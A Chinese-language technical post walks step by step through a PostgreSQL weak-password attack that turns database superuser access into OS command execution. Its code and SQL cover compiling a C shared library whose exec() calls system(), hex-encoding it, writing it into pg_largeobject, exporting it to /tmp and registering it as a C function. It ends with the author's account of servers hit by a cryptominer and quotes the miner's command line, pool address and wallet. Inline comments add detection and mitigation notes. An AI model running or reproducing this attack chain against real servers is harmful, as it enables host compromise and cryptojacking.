postgresql 弱口令 UDF 攻击

1. 首先通过端口扫描发现使用弱口令的 PostgreSQL 账号密码

2. 编写 UDF(自定义函数):先在本地编译生成 .so 文件,再上传到服务器

参考:https://www.postgresql.org/docs/9.5/static/xfunc-c.html



 gcc cmd2.c -I`pg_config --includedir-server` -fPIC -shared -o cmd.so



cmd2.c:


#include "stdlib.h"
#include "postgres.h"
#include <string.h>
#include "utils/geo_decls.h"


#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif


/* by value */
/*
 * Payload function. system(3) runs a shell inside the backend process, i.e.
 * as the database server's OS user on the DB host, and writes the listing of
 * /root to /tmp/result. The integer argument is returned unchanged and the
 * return value of system() is ignored. Because an arbitrary shell command can
 * sit here, a weak *superuser* password is equivalent to host compromise once
 * CREATE FUNCTION ... LANGUAGE C is reachable over the network.
 * NOTE(review): this is the old "version 0" C calling convention shown in the
 * linked 9.5 docs; PostgreSQL 10 and later removed it, so this particular
 * module does not load on current servers.
 */
int exec(int arg){
  system("ls /root -al> /tmp/result");
  return arg;
}
/*
 * By-value example from the PostgreSQL C-function docs: returns arg + 1.
 * Signed overflow at INT_MAX is undefined, as in the original example.
 */
int
add_one(int arg)
{
    int incremented = arg + 1;

    return incremented;
}


/* by reference, fixed length */


/*
 * By-reference, fixed-length example: returns a freshly palloc'd float8
 * holding *arg + 1.0. Memory comes from the backend's memory context, so
 * the caller does not free it.
 */
float8 *
add_one_float8(float8 *arg)
{
    float8 *incremented = (float8 *) palloc(sizeof(float8));

    *incremented = 1.0 + *arg;
    return incremented;
}


/*
 * Builds a new Point taking its x coordinate from pointx and its y
 * coordinate from pointy. The result is palloc'd in the current memory
 * context.
 */
Point *
makepoint(Point *pointx, Point *pointy)
{
    Point *combined = (Point *) palloc(sizeof(Point));

    combined->y = pointy->y;
    combined->x = pointx->x;
    return combined;
}


/* by reference, variable length */


/*
 * By-reference, variable-length example: returns a palloc'd copy of t.
 * VARSIZE(t) is the total struct size including the 4-byte header
 * (VARHDRSZ), so only VARSIZE(t) - VARHDRSZ payload bytes are copied.
 */
text *
copytext(text *t)
{
    text *duplicate = (text *) palloc(VARSIZE(t));

    /* header first, then the payload that follows it */
    SET_VARSIZE(duplicate, VARSIZE(t));
    memcpy(VARDATA(duplicate), VARDATA(t), VARSIZE(t) - VARHDRSZ);
    return duplicate;
}


/*
 * Concatenates two text values into a new palloc'd text. The result has
 * one header (VARHDRSZ) followed by arg1's payload and then arg2's.
 */
text *
concat_text(text *arg1, text *arg2)
{
    int32 payload1 = VARSIZE(arg1) - VARHDRSZ;
    int32 payload2 = VARSIZE(arg2) - VARHDRSZ;
    int32 new_text_size = VARHDRSZ + payload1 + payload2;
    text *new_text = (text *) palloc(new_text_size);
    char *dst = VARDATA(new_text);

    SET_VARSIZE(new_text, new_text_size);
    memcpy(dst, VARDATA(arg1), payload1);
    memcpy(dst + payload1, VARDATA(arg2), payload2);
    return new_text;
}


Java 工具:将 cmd.so 二进制文件转换为十六进制字符串,每 2048 个字节(2 kB)换一行

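/**
 * Encodes a byte array as an upper-case hexadecimal string, appending a
 * "\r\n" line break after every 2048 input bytes (4096 hex characters).
 *
 * @param data bytes to encode; an empty array yields an empty string
 * @return upper-case hex text with a CRLF after every 2048th input byte
 */
public static String byteToArray(byte[] data) {
    final String hexDigits = "0123456789ABCDEF";
    // StringBuilder replaces the original String '+=' loop, which copied the
    // whole accumulated string on every iteration (quadratic in data.length).
    StringBuilder result = new StringBuilder(data.length * 2 + (data.length / 2048) * 2);
    for (int i = 0; i < data.length; i++) {
        // Mask to 0..255 so negative bytes index the digit table correctly.
        int unsigned = data[i] & 0xFF;
        result.append(hexDigits.charAt(unsigned >>> 4));
        result.append(hexDigits.charAt(unsigned & 0x0F));
        if ((i + 1) % 2048 == 0) {
            result.append("\r\n");
        }
    }
    return result.toString();
}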
/**
 * Reads the shared object at the hard-coded path, hex-encodes it with
 * byteToArray, and prints the result to standard output.
 */
public static void main(String[] args) throws Exception {
    File input = new File("C:\\Users\\martin\\Downloads\\package\\libtest.so");
    byte[] bytes = FileUtils.readFileToByteArray(input);
    String hex = byteToArray(bytes);
    System.out.println(hex);
}



通过 SQL 命令,将 cmd.so 导出到 /tmp 目录下

-- lo_creat asks the server to allocate a new large-object OID (the argument is
-- ignored). 390334 below is presumably the OID it returned in the author's
-- session; it differs on every run.
select lo_creat(-1);
-- Direct DML on the pg_largeobject catalog bypasses the lo_* API. By default
-- only a superuser can read or write this catalog, so the weak credential
-- used here must belong to a superuser.
delete from pg_largeobject where loid=390334


-- Sanity check: the object should now have no pages.
select * from pg_largeobject where loid=390334


-- Each pg_largeobject page holds at most LOBLKSIZE bytes (2048 with the
-- default 8 kB block size), which is why the hex dump above is split every
-- 2048 bytes and written one pageno per insert.
insert into pg_largeobject (loid,pageno,data) values(390334,0,decode(''FFXXXXXXXXXXXXX....','hex'))
;
insert into pg_largeobject (loid,pageno,data) values(390334,1,decode(''FFXXXXXXXXXXXXX....','hex'))
;
insert into pg_largeobject (loid,pageno,data) values(390334,2,decode('FFXXXXXXXXXXXXX....','hex'))
;
insert into pg_largeobject (loid,pageno,data) values(390334,3,decode(''FFXXXXXXXXXXXXX....','hex'))
;


-- Server-side lo_export writes a file on the DB host as the server's OS user;
-- by default only superusers may call it (PostgreSQL 11+: or members of
-- pg_write_server_files). Detection: with log_statement set to 'mod' or 'all',
-- DML against pg_largeobject followed by lo_export to a world-writable path
-- such as /tmp is a strong indicator of this technique.
SELECT lo_export(390334, '/tmp/cmd.so');   //导出 到 /tmp 目录


创建函数:

-- Registers the exported shared object as a C-language function. C is an
-- untrusted language, so only a superuser can run this CREATE FUNCTION; this
-- is the privilege boundary the weak password crossed.
-- STRICT: the function is not invoked when its argument is NULL.
-- Mitigation: do not expose superuser logins to the network (restrict
-- pg_hba.conf and listen_addresses), use strong passwords with
-- password_encryption = scram-sha-256, and alert on CREATE FUNCTION ...
-- LANGUAGE C issued by application roles.
CREATE or replace FUNCTION exec(integer) RETURNS integer
     AS '/tmp/cmd.so', 'exec'
     LANGUAGE C STRICT;


执行自定义函数cmd.c的exec方法:
-- Calling the function runs the system() call inside the backend, i.e. as the
-- postgres OS user on the DB host. The literal '1' is resolved to integer by
-- the function's signature.
select exec('1')


可以在方法中执行启动进程等操作。我们公司 2 台阿里云服务器的 PostgreSQL 被人用这种方式放了挖矿程序,导致 CPU 占用率 100%;研究了一天搞清楚了原理,解决方法是将 PostgreSQL 密码改为复杂密码。


附:

黑客启动的挖矿程序的进程命令行:

/tmp/iftghlv -c x -M 
stratum+tcp://49rR8E9A3CZN2jdNpJK4NMLYKCM9TLbSEAB4m9FxLgXZC4pvz6mWfxK6NRHv9Y3C3Xa9nqRLjUUHfU7werrSne1DP3Ufgw2:x@xmr.crypto-pool.fr:3333/xmr






